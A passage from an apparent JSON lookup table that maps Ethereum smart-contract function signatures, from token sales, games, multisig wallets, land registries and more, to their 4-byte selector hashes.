"giveBirth(uint256)": "0x88c2a0bf", "breedWithAuto(uint256,uint256)": "0xf7d8c883", "_breedWith(uint256,uint256)": "0xa1f7f269", "canBreedWith(uint256,uint256)": "0x46d22c70", "_canBreedWithViaAuction(uint256,uint256)": "0x71fdd6d3", "isPregnant(uint256)": "0x1940a936", "isReadyToBreed(uint256)": "0xd3e6f49f", "setAutoBirthFee(uint256)": "0x4b85fd55", "approveSiring(address,uint256)": "0x4dfff04f", "_isSiringPermitted(uint256,uint256)": "0xc7e9aaaf", "setGeneScienceAddress(address,address)": "0xb2ea073f", "_toString(bytes32[4],uint256,string)": "0xb1a9f8a4", "_memcpy(uint256,uint256,uint256)": "0xf22aae52", "_approve(uint256,address)": "0x422b7964", "_approvedFor(address,uint256)": "0x4f8411e5", "_owns(address,uint256)": "0xe21fd9fc", "setMetadataAddress(address)": "0xe17b25af", "setSecondsPerBlock(uint256)": "0x5663896e", "_createKitty(uint256,uint256,uint256,uint256,address)": "0x338a63a4", "setCFO(address)": "0x4e0a3379", "tokenMetadata(uint256,string)": "0x0560ff44", "addToBalance()": "0xc0e317fb", "isOnSale(uint256)": "0xf0f2805f", "bleach(uint128,uint128)": "0xede02b71", "withdrawETH()": "0xe086e5ec", "clearSummonNum()": "0xdd50e9d4", "buyInMarket(uint256)": "0xd46aa610", "accoutToSummonNum(address)": "0xcf39bff5", "mix(uint256,uint256)": "0xb4bb58fb", "setBaseSummonPrice(uint256)": "0xab5706ee", "skinOfAccountById(address,uint256)": "0xa02a34cd", "getSkin(uint256)": "0x98e4f581", "setPrePaidFee(uint256)": "0x97b3116e", "createSkin(uint128,uint256)": "0x959b3fa0", "skinCreatedLimit()": "0x87934ec8", "levelClearTime()": "0x7b6e7603", "prePaidFee()": "0x7b04b1f8", "numSkinOfAccounts(address)": "0x733efe16", "levelSplits(uint256)": "0x6c779d57", "desiredPrice(uint256)": "0x6885edcd", "mixAuto(uint256,uint256)": "0x5b548ab4", "trCut()": "0x56f91399", "payMultiple(uint256)": "0x3ef5f368", "bleachPrice()": "0x3a21ec8d", "putOnSale(uint256,uint256)": "0x36f7992b", "summon()": "0x363dd19e", "nextSkinId()": "0x2c9ea1b7", "setMixFormulaAddress(address)": "0x287efb57", "accountsLastClearTime(address)": "0x278fcffa", "skinIdToOwner(uint256)": "0x2104fa0b", "mixFormula()": "0x2038e80a", "accoutToPayLevel(address)": "0x1e52f7b5", "kycWallet()": "0x2d2bb154", "regularTokenMaxSales()": "0x922497fc", "DaysTillUnlock()": "0x3aeb850a", "SchmecklelToken()": "0x109e591a", "icoPhase1EndTime()": "0xc46a3a0d", "shouldStopCoinSelling()": "0x38075446", "shopStorePrice()": "0x4f95ddec", "minInvestETH()": "0x35c2d49d", "preSaleMinEth()": "0x8678446e", "maxListingSeconds()": "0xc11403fc", "saleTokenPrice()": "0x51d28a7e", "minAcceptedAmountPresale()": "0x76c82e92", "onlyDeves()": "0x096cf33f", "addressFundInvestment()": "0x5f3bc04c", "raisedEth()": "0x8e6fdd31", "voterStakes()": "0xb033cab9", "usdPerMEth()": "0xba3603fd", "TokensAreFrozen()": "0xdfe33748", "isSoftcapOn()": "0xdcb12421", "BONUS_5_DAYS()": "0xb3ff8bfb", "accManager()": "0x1bf6e939", "lowBonusRate()": "0x0c975447", "worldContract()": "0x18758480", "decayRate()": "0xa9c1f2f1", "zen()": "0xc8290efd", "buyBuyerTokens()": "0xe8f8a1d2", "tokenBountyAllocated()": "0xec654389", "totalFoundCoin()": "0x8fbe382c", "getNumberOfAvailableStartTickets()": "0x01cff174", "nextMinPlay()": "0x3665708e", "D()": "0x0f529ba2", "fundLoan()": "0x8db57994", "remainRewards()": "0x7f2e0ec2", "rst()": "0x49a0e681", "window2EndTime()": "0x576cfdd7", "redemptionFund()": "0xeb4d0e32", "directTradeAllowed()": "0x41713a37", "FAPFounder()": "0xcbf7f009", "saleSupply()": "0xa96af0f4", "remain()": "0x61f3c62e", "PUBLIC_MAX_CONTRIBUTION()": "0x4190f365", "ALC_CONTRACT_ADDRESS()": "0xfc4b2473", "fundTokens()": "0xfcae08e1", "dividendsCollected()": "0x65c724cd", "card_blue_first()": "0x001b3fe6", "lockedTokenAddress()": "0xa666ff3c", "closingTimeExtensionPeriod()": "0x4845d3f8", "month12Allocated()": "0x3659d90f", "we_test_token()": "0x691e9961", "initialCompanysTokenAllocation()": "0xc3a39544", "unsoldVestingAddress()": "0x09153f57", "buyICloudSecsAgainstEther()": "0xc68309a7", "others_prize()": "0x634fe2a6", "ethRaisedWithoutCompany()": "0x9bf070b5", "bonusMode()": "0x4a574d18", "softCapTriggered()": "0xd5a7b500", "truebitAddress()": "0xfab57a21", "lastBetTimeSEC()": "0x0f9fb983", "burnOwnerTokens()": "0xff17bc98", "timeOfLastDistribution()": "0xec972fb0", "refundVault()": "0x11777af7", "icoRaisedETH()": "0xf4a222e9", "issueamount()": "0xc73f20e3", "ownerSecondary()": "0xd0015500", "canChangeLocked()": "0xf6729bf2", "isHalted()": "0xc7ff1584", "rateFirstRound()": "0x5127cab5", "ico3Cap()": "0x33d52c71", "jackpotBank()": "0x85093668", "CORPORATE_SUPPLY()": "0x48ac0f3c", "setDiscountValueOff()": "0x02543238", "etherAccumulator()": "0x3dba6197", "verifierAddress()": "0x18bdffbb", "tokensPerCents_gte5kUsd()": "0xd8ac5b4e", "ownerPause()": "0x967f1cc6", "icoHashedPass()": "0x0c3c450e", "BASE_POS()": "0x5c7b9ccf", "communityAddr_()": "0x3f03aab4", "agencyWallet()": "0xf648f20b", "fairsale_protection()": "0x94432deb", "deathData_a19()": "0x22a7533b", "icoDuration()": "0x25787747", "authorizerAddress()": "0xa03435d1", "withdrawalsInitiated()": "0x78d18bef", "buy5Price()": "0x5f788531", "CurrentIcePrice()": "0xca60f409", "committeesNumber()": "0x539407f6", "ROUND_3_PRESALE_BONUS()": "0x678a6baf", "hotWallet()": "0x29113bc8", "run2()": "0xd4f639ea", "owner_freeze_term()": "0xcd51f084", "PARTNER_SUPPLY()": "0xc48590e9", "presaleTokenSupply()": "0xc4fc3a3b", "promisedTokens()": "0x5e17b694", "maxCallFrequency()": "0x17183ca3", "priceStalePeriod()": "0x21cf3514", "firstPublish()": "0xf719edfb", "tokensPerSecond()": "0x4d8d9e92", "currentAmountRaised()": "0xee6f5dac", "soldSupply()": "0xfa2299ee", "newProposal(string)": "0x4f24186a", "newponzi()": "0x71589d6b", "newPayment(uint256,uint256)": "0x3baf4e1e", "newOwner(address)": "0x85952454", "newOrder(bool,uint256,uint256,uint256,uint256)": "0x2fac1a54", "new_mainPlayer(address)": "0x9229c504", "newKing(address)": "0x9a8f09bd", "newJester(address)": "0x4316abbb", "newInvestor()": "0xfb099c84", "newIncome(string)": "0x1d71a1cd", "new_game(uint256,uint256)": "0xd9e7ee1c", "newGame()": "0x7d03f5f3", "newfirst_player(address)": "0x66ad484c", "NewFeeAddress(address)": "0xdcff5581", "newDraw(uint256,uint8[3],uint256,uint256,uint256,uint256)": "0xc853c03d", "NewDeposit(uint256)": "0x7c69b5d1", "newDeal(uint256,uint256,uint256,uint256,uint256)": "0x78ae88d1", "newCurrency(string,string,uint8)": "0xf3dd3d8a", "newContract(bytes)": "0x1df473bc", "newClient(uint256,address)": "0x927ed13a", "newCampaign(uint32,uint96,uint16,uint16)": "0xba487e62", "newBribedCitizen(address)": "0x3bcf7d22", "nameFor(address)": "0x19350aea", "n()": "0x2e52d606", "MyToken(uint256,string,uint8,string)": "0x1d2bca17", "MyTokenLoad(uint256,string,uint8,string,address)": "0x041d0c0b", "MyToken()": "0x089327de", "myFundsExpireIn(uint256)": "0x6e658fbe", "MyBet(uint8,address)": "0xc95e81cb", "MyAdvancedToken(uint256,string,uint8,string,address)": "0x0bd089ab", "muteMe(bool)": "0x98391c94", "murder()": "0xfbeaebc6", "multipliers()": "0x9d7d6667", "multiplierFactor()": "0x30677b83", "multiAccessSetRecipientD(address,address)": "0x7429f1eb", "multiAccessSetRecipient(address)": "0xd1cf113e", "multiAccessRevokeD(bytes32,address)": "0xd1b4ff7e", "multiAccessRevoke(bytes32)": "0x7ed19af9", "multiAccessRemoveOwnerD(address,address)": "0x5a74dee5", "multiAccessRemoveOwner(address)": "0x73f310df", "multiAccessIsOwner(address)": "0xe419f189", "multiAccessHasConfirmed(bytes32,address)": "0xeb7402f5", "multiAccessGetOwners()": "0x446294ad", "multiAccessChangeRequirement(uint256)": "0x62891b5d", "multiAccessChangeRequirementD(uint256,address)": "0x6d522b19", "multiAccessChangeOwnerD(address,address,address)": "0x6c494843", "multiAccessChangeOwner(address,address)": "0x9bd99195", "multiAccessCallD(address,uint256,bytes,address)": "0x8b9726c1", "multiAccessCall(address,uint256,bytes)": "0x69a5e902", "multiAccessAddOwnerD(address,address)": "0x092a2e37", "multiAccessAddOwner(address)": "0x4f60f334", "MultiAccess()": "0xf714de9c", "MPO()": "0x33f472b9", "moveUnits(uint256,uint256,uint256[])": "0x231944e2", "move(uint256,address)": "0xd8a8e03a", "move_history(uint256)": "0x5837e083", "Moonraker(address,address)": "0x689b3e2d", "ModifySettings(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xa20c404f", "ModifyFeeFraction(uint256)": "0x411c4e72", "mint(int256,uint256,string)": "0xf41bfa9e", "mintGrey(int256,address,uint256)": "0x77ceded8", "mintGreen(int256,address,uint256)": "0x3a7fb796", "mint(int256,bytes32)": "0xd10e99fe", "minBetAmount()": "0xfa968eea", "Midas(address,address)": "0x026993e0", "MICRODAO(address,uint256,uint256,uint256,address)": "0x1e701780", "MicroDAO()": "0x8f8bde82", "meta(uint256,bytes32)": "0x7958533a", "meta(bytes32,bytes32)": "0x0257c48c", "Message(address,address,address,string)": "0x62be3172", "memcpy(uint256,uint256,uint256)": "0x11fe773d", "maximumCredit(address)": "0x8b543b80", "makeNewProposal(string,uint256)": "0x2f1e4968", "make_move(uint256,uint8,uint8,uint8,uint8)": "0xa35cfa22", "make_move_and_claim_victory(uint256,uint8,uint8,uint8,uint8,uint8,uint8,uint8)": "0x3df16377", "makeDeposit(uint256)": "0x059a500c", "makeClaim(uint256)": "0x1077f06c", "makeBet()": "0x561e91a1", "maintain(uint256,uint256)": "0x8af49ab7", "m()": "0x5a2ee019", "LuckyDoubler()": "0xb74bc710", "luckyDogInfo()": "0x21bb79fe", "lottery()": "0xba13a572", "lookupTicketHolder(uint256)": "0xa9fbc614", "LookAtPrizes()": "0xdfca2f53", "LookAtNumberOfPlayers()": "0xb1c6517a", "LookAtLastTimePerZone(uint256)": "0xb0ecca8f", "LookAtDepositsToPlay()": "0x7ee65635", "LookAtCollectedFees()": "0x25d4bdeb", "LookAtBalance()": "0xf7bd2361", "LookAtAllTheseTastyFees()": "0x3fd1f232", "lol()": "0x71e2d919", "log(string)": "0x41304fac", "logout(string)": "0x4cbee813", "login(string)": "0x3a7d280c", "lockAccount(uint256)": "0xe8d1e961", "lock()": "0xf83d08ba", "LittleEthereumDoubler()": "0x7b647652", "LittleCactus()": "0xfe71aec5", "len()": "0x56d88e27", "divMultiplier()": "0xf07b454c", "window0TokenCreationCap()": "0xe378f045", "reclaimContractTokens()": "0x8f14d8a3", "lockTokenController()": "0x4cc9f4e1", "tokensCreated()": "0x42750020", "donationUnlockTs()": "0x7dbff420", "bountyDelivered()": "0x52a00779", "creationMaxCap()": "0x321cb98a", "thePot()": "0x80b20208", "minBidDifferenceInSzabo()": "0x79770d5f", "unchainedMultisigVersionMajor()": "0x23eb861c", "hour_blocks()": "0x96ccacb0", "teamTimeLock1()": "0x822b0be3", "raffleTokenReward()": "0xb8cd81ed", "bountyDuration()": "0x200c7770", "buyLimitSupplyMin()": "0x7b9e9073", "USD_PER_ETH()": "0xb9408373", "tokenState()": "0xe90dd9e2", "currentKeyRound()": "0x8fc202ae", "bZxTo0xV2Contract()": "0x9ae6b186", "defaultLockBlocksForPool()": "0x9010c70b", "transferedToPool()": "0x02981cfe", "PHXTKN()": "0x7e245fac", "multisigETH()": "0x823914d9", "bonusProvider()": "0xc26a331d", "mintBooty()": "0x53547d3f", "feesStrategy()": "0xfa912743", "alreadyReservedForTeam()": "0x7f5f9128", "isToonInterface()": "0x35bb5fd2", "c_softCapUsd()": "0x87f1e7f3", "withdrawReservedTokens()": "0xaf4e3d37", "devTeamTokenAddress()": "0x04c6ff7c", "maxPremiumDragonsCount()": "0x47220f25", "PRICE_MAX()": "0x75b77c4b", "allowIssua()": "0x654b3110", "ledgerContractAddr()": "0x24788ed9", "presaleStart_6_December()": "0xd39d8fce", "minBuyTokenAmount()": "0x5f9dfc79", "feeRatio()": "0x41744dd4", "ENDING_TIME()": "0xa5cf599c", "marketDataOracle()": "0xfdb7b065", "InterCryptoNode()": "0x323aca70", "thawTransfers()": "0xce8e120a", "tokenCap()": "0xdd54291b", "realDevRewardWeight()": "0x17d2e4e4", "icoThreshold3()": "0x31225ad1", "bonusEnds1()": "0x3659a8b2", "defaultOwner()": "0x17de2f1f", "comment()": "0xf4f3c8a4", "coOwner()": "0xd6d34c7c", "weekThreeStart()": "0x35085b58", "nextOwner()": "0x69f3331d", "maxCWCsPerReturnLessThan()": "0xa5e4e9a0", "UBIATARPLAY_CAP()": "0x329a88d5", "vendingAttachedState()": "0x4dc13951", "ACL_APP()": "0xa3b4b07f", "MAX_PRESALES_EXTENSION()": "0xd8174150", "usdPerEve()": "0x8dca5511", "PRIVATE_SALE()": "0x98c83a16", "last_completed_migration()": "0x445df0ac", "failedVerificationSlashAmount()": "0xbe5c2423", "getNumeroMensajes()": "0x7a457855", "preicoTokensPerEth()": "0xf6b09195", "stage4Start()": "0xa9875d70", "CMO_Signature()": "0xf4f572ae", "WITHDRAW_ADDRESS()": "0x122e04a8", "allowedAccount()": "0x93d759b8", "DIVISOR_PRICE()": "0x2b750f4f", "centralBanker()": "0x506b56da", "multiWallet()": "0x4ab7508a", "_thresholdTwo()": "0x9d94a8fa", "soldAmount()": "0xfa1a5f59", "loyaltyWallet()": "0x89ebe846", "claimRepository()": "0x914810a3", "notary()": "0x9d54c79d", "groomAddr()": "0xdcfc4430", "feePercantage()": "0x867e248c", "TGE_SUPPLY()": "0x7c81ff56", "ActiveSalesPhase()": "0x443b22e6", "mintStart2()": "0x3568bd39", "minimalSuccessTokens()": "0x5e3bb4cc", "LockInventory()": "0xcf32b957", "total_user_eth_cap()": "0xb8803738", "ISSUE_METHOD()": "0xe8bfebec", "units40percentExtra()": "0x48582a2a", "presaleIsRunning()": "0x42e2d18c", "get_all_sellable_token()": "0x609a54b0", "taxWallet()": "0x2dc0562d", "dev()": "0x91cca3db", "to()": "0x13151981", "DIVIDEND()": "0xfc3fc168", "mainSale_Cap()": "0x010b66de", "verificationCountInt()": "0x5634653d", "create20ContractToy()": "0x5ef80c87", "postICOSale()": "0x5fccfda4", "minPurchaseOnce()": "0xb4f5a6a6", "previous_owner()": "0xcc3ccf57", "ICO_BONUS_TIME_1()": "0x38e29ef0", "marketGolds()": "0x0324149a", "canStartSale2()": "0x04ed3f6a", "oracleCount()": "0x613d8fcc", "requestPrice()": "0x1604f9ea", "ComplexExchanger(address,uint256,uint256,address[],uint256,address)": "0x982713e1", "withdrawReserve()": "0xace1fab1", "refillBalance()": "0x09af014f", "getOracleData(uint256)": "0x536e3f6a", "calcRates()": "0x9b678bfc", "requestRates()": "0x1cdc51e7", "sellTokens(address,uint256)": "0xc464fe65", "MossCoin(uint256)": "0x13194658", "unlock(bytes32,bytes32,bytes32)": "0xd41bdea7", "FishProxy(address,address)": "0x9fb65754", "SharkProxy()": "0xa7d2b73f", "TutorialToken(address)": "0x4ce0032f", "MaxCoin()": "0x44074cc7", "RedBUX()": "0xbea412fa", "TokenCLC(uint256,string,string)": "0x3912572d", "ObjectToken(uint256,string,uint8,string)": "0xf10cb3da", "HopiumToken()": "0x0bf757e5", "GCSToken()": "0x9a98ac88", "OysterPrePearl()": "0xcd0699e9", "setupFundingInfo(uint256,uint256)": "0xf699ad94", "patformWithdraw(uint256)": "0x034741a8", "airdrop(address,uint256)": "0x8ba4cc3c", "PGDToken()": "0x826c2447", "setNote(uint256,bytes32,bytes20,string,string)": "0x4cdd3002", "addNote(bytes32,bytes20,string,string)": "0xd8013c4e", "EUR_Omnidollar()": "0x788bb8df", "calculateEggSell(uint256,uint256)": "0xc5292ed9", "getDragonPriceNo()": "0x7b2d1b30", "getDragonPrice(uint256,uint256)": "0xc2596b1e", "buyIceDrangon()": "0x87d79f8a", "buyDrangon()": "0x1d66105b", "getFreeDragon()": "0x8fcbeeb7", "calculatePercentage(uint256,uint256)": "0x2133e3b9", "setUserHatchRate()": "0x6309242c", "getMyIceDragon()": "0xc6601270", "getMyNormalDragons()": "0xe69432c8", "getEggsToHatchDragon()": "0x77463b50", "claimSuperDragonEggs()": "0xc7888a07", "buySuperDragon()": "0xe2c1f02c", "withDrawMoney()": "0x176e5f32", "enableSuperDragon(bool)": "0x1c484a34", "ymtest(uint256)": "0xa1b5b581", "setVirtualReserveBalance(uint256)": "0xbd8caabf", "setissuedSupplyRatio(uint256)": "0xcee96f49", "extractFees(uint256)": "0xb9c8464d", "FinanceChain(uint256,string,string)": "0xca7bfc5d", "TheIlluminati()": "0x854cb674", "AMTBToken()": "0x3c402bd1", "placeCoin(uint16,uint16)": "0xe2a288c0", "getAllCoins()": "0xa4ec0620", "getNumCoins()": "0xb419bd17", "isThereACoinAtCoordinates(uint16,uint16)": "0xbaa90366", "CoinStacks()": "0xa266b0f2", "QISHENG(uint256,string,string)": "0x1ae7ef0a", "setUpdateOperator(uint256,address)": "0xb0b02c60", "expandNegative128BitCast(uint256)": "0x426d4f22", "setLatestToNow(address)": "0x133cbe3a", "forbidDeploy(address)": "0xfd7a1b00", "authorizeDeploy(address)": "0x341f13f2", "isUpdateAuthorized(address,uint256)": "0x65937ab9", "FullAssetRegistry()": "0x32615457", "_update(uint256,string)": "0xa3d5e8e0", "description()": "0x7284e416", "_doTransferFrom(address,address,uint256,bytes,address,bool)": "0x2bc57d73", "_destroy(uint256)": "0x278e72da", "_generate(uint256,address)": "0x4a3db7e7", "_clearApproval(address,uint256)": "0x91127c1f", "_removeAssetFrom(address,uint256)": "0xf2460172", "_addAssetTo(address,uint256)": "0x021f0376", "_clearAuthorization(address,address)": "0x77eaa420", "_addAuthorization(address,address)": "0x4ffb861e", "onERC721Received(uint256,address,bytes)": "0x5254a38c", "getApprovedAddress(uint256)": "0xeca4742a", "updateManyLandData(int256[],int256[],string)": "0x1e4c7736", "updateLandData(int256,int256,string)": "0xd4dd1594", "transferManyLand(int256[],int256[],address)": "0x4dad9003", "transferLand(int256,int256,address)": "0x35e64aaa", "landData(int256,int256)": "0x4c4bf936", "landOf(address)": "0x885363eb", "ownerOfLandMany(int256[],int256[])": "0x1d4b11e4", "ownerOfLand(int256,int256)": "0x1080f251", "exists(int256,int256)": "0xa8d88127", "decodeTokenId(uint256)": "0x7efd9112", "encodeTokenId(int256,int256)": "0x6fb7e588", "clearLand(int256[],int256[])": "0x9cf66997", "assignMultipleParcels(int256[],int256[],address)": "0x8668a416", "assignNewParcel(int256,int256,address)": "0x1cc69ac1", "initialize(bytes)": "0x439fab91", "OwnableStorage()": "0x46e6ffdd", "AVMToken()": "0x8041fcc4", "activate(address,uint256,address,uint256,uint256,uint256,bool,bool)": "0x358a08cb", "TokenTrader(address,uint256,address,uint256,uint256,uint256,bool,bool)": "0xdcf7c0d0", "getTrader(uint256)": "0xbcfbd445", "getDeflator()": "0x29ed82a1", "calcCount(uint256)": "0x018dfaa0", "calcTotal(uint256)": "0xaf6128c2", "bva(address,uint256,address)": "0x6dda9b24", "x888()": "0x8df8228c", "payUserIncomingTransactionCommission(address)": "0x814f9201", "payPlatformOutgoingTransactionCommission()": "0x71bbefc7", "payPlatformIncomingTransactionCommission(address)": "0x12ccb421", "setTokensMultiplier(uint256)": "0x27393390", "setTokensDecimals(uint256)": "0x795ebb68", "setTokensContractAddress(address,address)": "0x77886028", "getUserClientsCount(address)": "0xf49bbb23", "addCommissionAmount(uint256,address)": "0x32aaf9d7", "isClientAddedBefore(address,address)": "0xc0fe6c92", "getProductContractClients(address)": "0x6a0f7b7c", "getProductContractCommissionWei(address)": "0x2d8d488c", "getProductContractUser(address)": "0xd8a9e45e", "registerProductContract(address,address)": "0xcaa25756", "getUserProductContracts(address)": "0x1c47624b", "unblockUser(address)": "0x39d319e5", "blockUser(address)": "0x3da01325", "isUserBlocked(address)": "0xb4a77b0e", "calculateUserCommission(uint256)": "0x3e798e83", "setUserCommissionRate(uint256)": "0xf2f2a043", "calculatePlatformCommission(uint256)": "0xa99fba7d", "setPlatformCommissionRate(uint256)": "0x18cee8a4", "addVersion(string,address)": "0x2200919f", "ArrowTestCoin()": "0xb9a804fb", "setTotalWithdraw(uint256,address,uint256,bytes,bytes)": "0xf181b388", "deprecate()": "0x0fcc0c28", "_setWhitelistedUser(address)": "0xd4e4716f", "_setBlacklistedUser(address)": "0x4c841e5d", "_setNonlistedUser(address)": "0xae181958", "_setMinter(address)": "0x2373f091", "isBlacklistDestroyer(address)": "0xf530259e", "isBlacklistSpender(address)": "0x91c4529f", "isNonlistedUser(address)": "0x4d54dc96", "isBlacklistedUser(address)": "0x7ccce851", "isWhitelistedUser(address)": "0xd88c271e", "setNonlistedUser(address)": "0xcd495391", "setBlacklistedUser(address)": "0xc56bea64", "setWhitelistedUser(address)": "0x09533303", "removeBlacklistDestroyer(address)": "0x556b6384", "setBlacklistDestroyer(address)": "0x231a439e", "removeBlacklistSpender(address)": "0x029043a4", "setBlacklistSpender(address)": "0xc1331bc3", "hasUserPermission(address,bytes4)": "0x14db6d58", "getPermission(bytes4)": "0x1830f493", "isPermission(bytes4)": "0x933aa667", "removeUserPermission(address,bytes4)": "0x5317e444", "setUserPermission(address,bytes4)": "0x1c870eee", "removePermission(bytes4)": "0xb8ccbd17", "addPermission(bytes4,string,string,string)": "0x780bfed0", "computeFee(uint256,uint256)": "0x2ff284c2", "computeStablecoinFee(uint256,address)": "0x166e55d9", "removeStablecoin(address)": "0x3b947d2b", "addStablecoin(address)": "0x0418945a", "removeFee(address)": "0x6ad26611", "infytoken()": "0xb51be1db", "addConfig(bytes32,bytes32)": "0xc4909a70", "getForecast(bytes32,uint8,uint256)": "0xdfb41e7c", "performRefund(bytes32,uint8,uint256,uint256)": "0x79381c80", "refund(bytes32,uint8,uint256,uint256)": "0xb88d6aa7", "refundUser(bytes32,uint8,uint256,uint256)": "0xf71b041c", "payout(bytes32,uint256,uint256)": "0xc5a60ddb", "addForecast(bytes32,uint256,uint8)": "0x5970c40a", "addPrediction(bytes32,uint256,uint256,uint8,uint256,address,address)": "0xeeced605", "calculatePrizeAmount(uint256,uint256,uint256)": "0xe2bca77e", "refundToBuyersIfSoftCapNotReached(uint256)": "0x08c2e0a6", "changeSoftCap(uint256,uint256)": "0xeb907398", "changeMaximumContributionForAllPhases(uint256)": "0xfbc805ee", "changeMinimumContributionForAllPhases(uint256)": "0x0b96740c", "setPriceRate(uint256,uint256)": "0x4f962b72", "changeStartDate(uint256,uint256)": "0x3c0afb59", "changeEndDate(uint256,uint256)": "0x20522347", "WhatTimeIsNow()": "0x7dda48a5", "AddNewPhase(uint256,uint256,uint256,uint256,uint256,uint256)": "0x08051004", "etherTransfer(address,uint256)": "0x9c250dd8", "returnTokens(address,address,uint256)": "0x57fc3991", "getLockedTokens()": "0x3317bbcc", "getWithdrawCount()": "0x47d04c71", "getContributionsCount()": "0xe11b53af", "getBonusReceived()": "0xfd0bb752", "checkAllowance()": "0x9405de64", "multiSendTokenComplete()": "0x5df2df2f", "multiSendEth()": "0x405136fa", "setEthBonus(uint256)": "0x8bfbc753", "multiSendToken()": "0x1b1a7a58", "changeWithdrawnTime(uint256)": "0x75e8b1a3", "seePurchase(uint256)": "0xf1d2b8ab", "newPurchase(string)": "0x9f2763d2", "finalizeDestruction()": "0x2493097b", "startDestruction()": "0xfe43be3f", "setWithdrawGasOverhead(uint256)": "0xedf2d2a2", "isDestructionStarted()": "0x7ae38a95", "payOffClaim(bytes32,uint256)": "0x7a1439d7", "claimMistake(bytes32)": "0x1e0e17a2", "addBond()": "0xeec1a391", "zkWithdraw(bytes32,uint256,address,uint256[2],uint256[],uint256[],uint256[])": "0x8e0c8999", "ValidatorBond(address,address)": "0xa5a3ad0b", "getMixParticipant(bytes32,uint256,uint256)": "0x6dd22ccd", "getPubKeyArr50(bytes32,uint256,uint256[])": "0x1591bf51", "zkWithdrawTrusted(bytes32,uint256,address,uint256[2],uint256[],uint256[],uint256[],uint256)": "0x8cd47415", "rsVerifyPublic(bytes32,uint256[2],uint256[],uint256[],uint256[],uint256[])": "0xf3e1cb63", "constructUrl(bytes32,uint256)": "0xb8ccc682", "validateRequestParams(address[4],address,uint256[12],uint256,bytes,uint256)": "0xfef5f1e7", "createValidatedRequest(address[4],address,uint256[12],uint256,bytes)": "0x99afb9b9", "createRequest(address[4],address,uint256[12],uint256,bytes)": "0x6bb2c12f", "testGetNewItemId()": "0x969be87e", "getNewItemId(bytes32)": "0x49ee6c50", "erc165InterfaceSupported_NoCache(address,bytes4)": "0xddc23ddd", "getInterfaceImplementer(address,bytes32)": "0xaabbb8ca", "erc165InterfaceSupported(address,bytes4)": "0x90e47957", "interfaceHash(string)": "0x65ba36c1", "setManager(address,address)": "0x5df8122f", "erc165UpdateCache(address,bytes4)": "0x571a1f66", "getManager(address)": "0x3d584063", "setInterfaceImplementer(address,bytes32,address)": "0x29965a1d", "setLottery(address)": "0xf298083b", "salarySent()": "0xd40fd402", "weiReceived()": "0xa000aeb7", "payments(uint256)": "0x87d81789", "getTeamSalary()": "0x86985bee", "checkPayments(uint256)": "0x8661009b", "deusETH()": "0x5a1bdaa1", "changeLottery(address)": "0x512f8f92", "getGain(uint256)": "0x2dcd4e41", "started()": "0x1f2698ab", "investors(uint256)": "0x3feb5f2b", "currentManager()": "0x104b6704", "MinSum()": "0xc2808d1a", "Acc(address)": "0x7731cd2a", "Put(uint256)": "0x65f3c31a", "SetMinSum(uint256)": "0x640d3017", "Initialized()": "0x5daa87a0", "Collect(uint256)": "0x3fe43822", "SetLogFile(address)": "0x303b9379", "performDifferent(address,address[],uint256[])": "0x7aa50c56", "performEqual(address,address[],uint256)": "0xe12bceeb", "LightAirdrop()": "0x0699f10a", "getHolder(uint256)": "0xe8a96b46", "getState(uint256)": "0x44c9af28", "livingSupply()": "0xbdb6bce8", "ownerEmit()": "0x50909851", "buy(string)": "0x492cc769", "claim_partnerPreICOTokens(address)": "0x6e3c5759", "claim_PreICOTokens(address)": "0x182439de", "periodNow()": "0x27ac9e5f", "tokensToEther(uint256,uint256)": "0xf720f3d2", "etherToTokens(uint256,uint256)": "0x0fa95aee", "cast(uint256)": "0x738198b4", "addExchange(address)": "0xaa10ce22", "BM_ICO()": "0xd56b7577", "add_referral(address,string,uint256)": "0x0064d618", "partnerPreICOBonus(address)": "0x00dff60a", "refferalPreICOBonus(address)": "0xa7432434", "getDataHolders(address)": "0xecbdb633", "execute(uint8[],bytes32[],bytes32[],address,uint256,bytes)": "0xf12d394f", "startedAt()": "0xf21f537d", "lastPlayer()": "0xe3450e13", "refFeeVal()": "0xdf5dd98f", "rightLottery()": "0xcac6edd8", "totalWinnings()": "0xb72481f8", "lotteryFeeVal()": "0xaba7ad0d", "leftLottery()": "0xa8b1895d", "winners(uint256)": "0xa2fb1175", "blocks()": "0x967ff23e", "lastBlock()": "0x806b984f", "lotteryFee()": "0x78aa08ed", "jackpot()": "0x6b31ee01", "houseFeeVal()": "0x2a2998a0", "houseFee()": "0x0ed469b8", "distribute(address[])": "0x6138889b", "multiCall()": "0x7fc611f0", "submissionPool()": "0xebe02377", "developerCut()": "0xe72fd4e1", "changeAdmin(address,bool)": "0xdc11a496", "memeData(uint256)": "0xbd9d6d7f", "endingBalance()": "0xb6fb7e46", "submissionPrice()": "0x9d733f0c", "changeSubmissionPrice(uint256)": "0x969cb4da", "withdrawBalance(address)": "0x756af45f", "refundByToken(uint256)": "0x6c9c97d8", "refundSubmission(address,uint256)": "0x49e588df", "withdraw(uint256,uint256)": "0x441a3e70", "getMemeData(uint256)": "0x2a7ca11f", "creatorBalances(address)": "0x2a782802", "transferToken(address,address,uint256)": "0xf5537ede", "allowance(address,uint256)": "0xddc6a171", "createUnicorn(address)": "0xce5a5df7", "isUnfreezed(uint256)": "0xcbde2ff0", "isTourUnfreezed(uint256)": "0xc4cbd65b", "unicornBreeding()": "0xc1072279", "marketTransfer(address,address,uint256)": "0xbcf0dd8e", "clearApprovalForGeneLab(uint256)": "0xb5364560", "minusTourFreezingTime(uint256,uint64)": "0xa60b8aa9", "unicornsOf(address)": "0x96c81be5", "approveForGeneLab(uint256)": "0x8758ba8f", "unicorns(uint256)": "0x69f467c1", "getUnicornGenByte(uint256,uint256)": "0x614984d1", "updateGene(uint256,bytes)": "0x4cba4ca4", "minusFreezingTime(uint256,uint64)": "0x4a3a92f6", "plusFreezingTime(uint256)": "0x3e8eca23", "setGene(uint256,bytes)": "0x316524e5", "getGen(uint256)": "0x2dcbac97", "parseResult(bytes)": "0x57b70510", "parseTrade(bytes)": "0x53abf7f4", "parseChannel(bytes)": "0x0b513828", "toAddress(bytes,uint8)": "0xec788712", "slice(bytes,uint8,uint8)": "0x01d81a50", "toBytes32(bytes,uint8)": "0x1ca7bcc7", "toBool(bytes,uint256)": "0x907631fc", "toInt(bytes,uint8,uint8)": "0x5cb047e8", "toUint(bytes,uint8,uint8)": "0x635d0239", "addInt(uint256,int256)": "0xa7256621", "setSaleEnd()": "0xf835a686", "setRegionOwner(uint16,address,uint256)": "0xb68e8552", "getRegionTax(uint16)": "0x9f9f1fbe", 